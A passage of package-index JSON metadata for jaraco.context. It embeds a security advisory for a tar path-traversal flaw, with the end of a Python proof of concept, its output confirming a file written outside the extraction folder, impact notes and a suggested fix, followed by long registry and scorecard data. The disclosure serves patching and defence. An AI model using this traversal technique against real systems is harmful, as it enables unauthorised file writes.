# Cleanup\n        print()\n        print(f\\\"[*] Cleaning up: {temp_base}\\\")\n        try:\n            shutil.rmtree(temp_base)\n        except Exception as e:\n            print(f\\\"[!] Cleanup error: {e}\\\")\n\n\ndef check_python_version():\n    print(f\\\"[+] Python version: {sys.version}\\\")\n    # Python 3.11.4+ added DEFAULT_FILTER\n    if hasattr(tarfile, 'DEFAULT_FILTER'):\n        print(\\\"[+] Python has DEFAULT_FILTER (tarfile security hardening)\\\")\n    else:\n        print(\\\"[!] Python does not have DEFAULT_FILTER (older version)\\\")\n    print()\n\n\nif __name__ == \\\"__main__\\\":\n    check_python_version()\n    exploit_zipslip()\n```\n\nOutput:\n```\n[+] Python version: 3.11.2 (main, Apr 28 2025, 14:11:48) [GCC 12.2.0] \n[!] Python does not have DEFAULT_FILTER (older version) \n\n[*] Target: setuptools._vendor.jaraco.context.tarball() \n[+] Created target extraction directory: /tmp/zipslip_test_tnu3qpd5/extraction_target \n[*] Creating malicious tar archive... \n[*] Extracting: ../../tmp/pwned_by_zipslip.txt           -\u003e ../../tmp/pwned_by_zipslip.txt \n    ✓ Extracted successfully \n[*] Extracting: ../../../../home/pwned_home.txt          -\u003e ../../../../home/pwned_home.txt \n    ! PermissionError: Path traversal ATTEMPTED \n[*] Extracting: ../escaped.txt                           -\u003e ../escaped.txt \n    ✓ Extracted successfully \n[*] Extracting: legitimate_file.txt                      -\u003e legitimate_file.txt \n    ✓ Extracted successfully \n[*] Checking for extracted files... \n[*] Files in target directory (/tmp/zipslip_test_tnu3qpd5/extraction_target): \nextraction_target/ \n  legitimate_file.txt \n    └─ This file stays in target directory... \n\n[*] Checking for traversal attempts... \n\n[-] OK: Escape to /tmp - No escape detected \n[-] OK: Escape to home - No escape detected \n[+] Path Traversal Confirmed: Escape to parent \n      File created at: /tmp/zipslip_test_tnu3qpd5/escaped.txt \n      Content: [ZIPSLIP] File in parent directory! \n      Removing: /tmp/zipslip_test_tnu3qpd5/escaped.txt \n[+] EXPLOIT SUCCESSFUL - Path traversal vulnerability confirmed! \n\n[*] Cleaning up: /tmp/zipslip_test_tnu3qpd5\n```\n\n### Impact\n\n- Arbitrary file creation in filesystem (HIGH exploitability) - especially if popular packages download tar files remotely and use this package to extract files.\n- Privesc (LOW exploitability)\n- Supply-Chain attack (VARIABLE exploitability) - relevant to the first point.\n\n### Remediation\n\nI guess removing the custom filter is not feasible given the backward compatibility issues that might come up you can use a safer filter `strip_first_component` that skips or sanitizes `../` character sequences since it is already there eg.\n```\nif member.name.startswith('/') or '..' in member.name:\n  raise ValueError(f\\\"Attempted path traversal detected: {member.name}\\\")\n```","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-01-13T21:48:17.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.6,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N","references":["https://github.com/jaraco/jaraco.context/security/advisories/GHSA-58pv-8j8x-9vj2","https://github.com/jaraco/jaraco.context/commit/7b26a42b525735e4085d2e994e13802ea339d5f9","https://nvd.nist.gov/vuln/detail/CVE-2026-23949","https://github.com/jaraco/jaraco.context/blob/main/jaraco/context/__init__.py#L74-L91","https://github.com/pypa/setuptools/blob/main/setuptools/_vendor/jaraco/context.py#L55-L76","https://github.com/advisories/GHSA-58pv-8j8x-9vj2"],"source_kind":"github","identifiers":["GHSA-58pv-8j8x-9vj2","CVE-2026-23949"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-13T22:00:08.032Z","updated_at":"2026-08-20T13:03:57.727Z","epss_percentage":0.00548,"epss_percentile":0.4353,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01OHB2LThqOHgtOXZqMs4ABRC2","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01OHB2LThqOHgtOXZqMs4ABRC2","packages":[{"ecosystem":"pypi","package_name":"jaraco.context","versions":[{"first_patched_version":"6.1.0","vulnerable_version_range":"\u003e= 5.2.0, \u003c 6.1.0"}],"purl":"pkg:pypi/jaraco.context"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01OHB2LThqOHgtOXZqMs4ABRC2/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/jaraco.context","docker_dependents_count":191,"docker_downloads_count":2964388768,"usage_url":"https://repos.ecosyste.ms/usage/pypi/jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context","https://github.com/sponsors/jaraco"],"critical":true,"issue_metadata":{"last_synced_at":"2026-08-24T13:38:08.182Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":0,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":0,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":null,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/jaraco.context/codemeta","maintainers":[{"uuid":"jaraco","login":"jaraco","name":null,"email":null,"url":null,"packages_count":167,"html_url":"https://pypi.org/user/jaraco/","role":null,"created_at":"2023-02-24T12:06:17.200Z","updated_at":"2023-02-24T12:06:17.200Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/jaraco/packages"}],"registry":{"name":"pypi.org","url":"https://pypi.org","ecosystem":"pypi","default":true,"packages_count":930550,"maintainers_count":399716,"namespaces_count":0,"keywords_count":311773,"github":"pypi","metadata":{"funded_packages_count":58574,"rate_limit":2},"icon_url":"https://github.com/pypi.png","created_at":"2022-04-04T15:19:23.364Z","updated_at":"2026-08-24T05:05:47.334Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/namespaces"}},{"id":13009110,"name":"py3-jaraco.context","ecosystem":"alpine","description":"Context managers by jaraco","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2025-04-27T13:53:06.000Z","latest_release_published_at":"2025-04-27T13:53:06.000Z","latest_release_number":"6.0.1-r1","last_synced_at":"2026-04-09T13:02:05.155Z","created_at":"2026-01-31T00:52:16.897Z","updated_at":"2026-08-06T19:26:18.216Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.23/community/x86_64/py3-jaraco.context","install_command":"apk add py3-jaraco.context","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.216Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-jaraco.context?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.23","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-jaraco.context/codemeta","maintainers":[{"uuid":"bribbers@disroot.org","login":null,"name":"Bart Ribbers","email":"bribbers@disroot.org","url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","packages_count":2364,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","role":null,"created_at":"2026-03-03T17:51:06.115Z","updated_at":"2026-03-03T17:51:06.115Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/maintainers/bribbers@disroot.org/packages"}],"registry":{"name":"alpine-v3.23","url":"https://pkgs.alpinelinux.org/packages?branch=v3.23","ecosystem":"alpine","default":false,"packages_count":27576,"maintainers_count":428,"namespaces_count":2,"keywords_count":189,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1042},"icon_url":"https://github.com/alpinelinux.png","created_at":"2026-01-24T14:35:50.739Z","updated_at":"2026-08-24T05:05:17.086Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/namespaces"}},{"id":12828419,"name":"python311Packages.jaraco-context","ecosystem":"nixpkgs","description":"Python module for context management","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-01-26T19:22:43.380Z","latest_release_published_at":"2026-01-26T19:22:43.380Z","latest_release_number":"4.3.0","last_synced_at":"2026-04-03T09:26:04.492Z","created_at":"2026-01-26T19:22:43.233Z","updated_at":"2026-08-06T19:26:18.264Z","registry_url":"https://search.nixos.org/packages?channel=23.05\u0026query=python311Packages.jaraco-context","install_command":"nix-env -iA nixpkgs.python311Packages.jaraco-context","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.05/pkgs/development/python-modules/jaraco-context/default.nix#L40","metadata":{"nix_attribute":"python3.11-jaraco-context-4.3.0","position":"pkgs/development/python-modules/jaraco-context/default.nix:40","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mipsel-linux","mips64el-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"jaraco-context","upstream_purl":"pkg:pypi/jaraco-context"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: 